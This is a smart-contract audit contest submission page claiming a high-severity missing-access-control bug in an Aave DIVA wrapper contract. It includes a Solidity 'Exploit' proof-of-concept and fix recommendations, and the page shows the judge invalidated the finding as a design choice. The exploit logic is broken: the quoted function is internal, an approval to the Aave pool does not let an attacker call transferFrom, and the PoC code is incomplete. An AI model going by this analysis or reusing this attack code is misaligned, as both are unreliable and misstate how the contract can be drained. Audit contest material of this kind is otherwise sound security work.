Aave DIVA Wrapper

DIVA

HardhatDeFi

15,000 USDC

View results

Previous Next

Submission Details

Severity: high

Invalid

Unauthorized Approval in _approveCollateralTokenForAave()

kunwarsiddarths

Summary

The _approveCollateralTokenForAave() function in AaveDIVAWrapper.sol lacks an onlyOwner restriction, allowing any external caller to approve unlimited collateral spending to AaveV3. This can lead to unauthorized fund withdrawals, resulting in a critical loss of user funds.

Vulnerability Details

function _approveCollateralTokenForAave(address _collateralToken) internal {
// Ensure the collateral token is registered before setting approval.
if (_collateralTokenToWToken[_collateralToken] == address(0)) {
revert CollateralTokenNotRegistered();
}
uint256 currentAllowance = IERC20Metadata(_collateralToken).allowance(address(this), _aaveV3Pool);
IERC20Metadata(_collateralToken).safeIncreaseAllowance(_aaveV3Pool, type(uint256).max - currentAllowance);
}

Impact

Anyone can call approveCollateralTokenForAave() externally.

This allows an attacker to set unlimited collateral token approvals to AaveV3.
Once approved, malicious actors can drain collateral tokens from the contract.
A full loss of collateral funds is possible if an attacker exploits this bug.

Attack Scenario:

The attacker calls approveCollateralTokenForAave(collateralToken), approving type(uint256).max.
The attacker then calls Aave’s withdraw() function, draining all approved collateral tokens.
The contract loses all collateral funds, and the attacker escapes with stolen assets.

##Proof of Exploit (PoC)
An attacker can execute the following script to exploit the contract:

contract Exploit {

AaveDIVAWrapper public target;

constructor(address _target) {

target = AaveDIVAWrapper(_target);

}

function attack(address collateralToken) external {

// Call approveCollateralTokenForAave as an attacker

target.approveCollateralTokenForAave(collateralToken);

// Now, use the approved allowance to withdraw all funds from Aave

IERC20(collateralToken).transferFrom(address(target), msg.sender, IERC20(collateralToken).balanceOf(address(target)));

}

Tools Used

Manual Review

Recommendations

Add an onlyOwner modifier to approveCollateralTokenForAave() in AaveDIVAWrapper.sol:

function approveCollateralTokenForAave(address _collateralToken) external override onlyOwner {

_approveCollateralTokenForAave(_collateralToken);

}

Additionally, update _approveCollateralTokenForAave() to use safeApprove() instead of safeIncreaseAllowance():

IERC20Metadata(_collateralToken).safeApprove(_aaveV3Pool, type(uint256).max);

Updates

Lead Judging Commences

bube Lead Judge 9 months ago

Submission Judgement Published

Invalidated

Reason: Design choice

Prize pool breakdown

Total prize

15,000 USDC

nSLOC

519

29 USDC / LOC

High Medium

14,000

Low

1,000

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.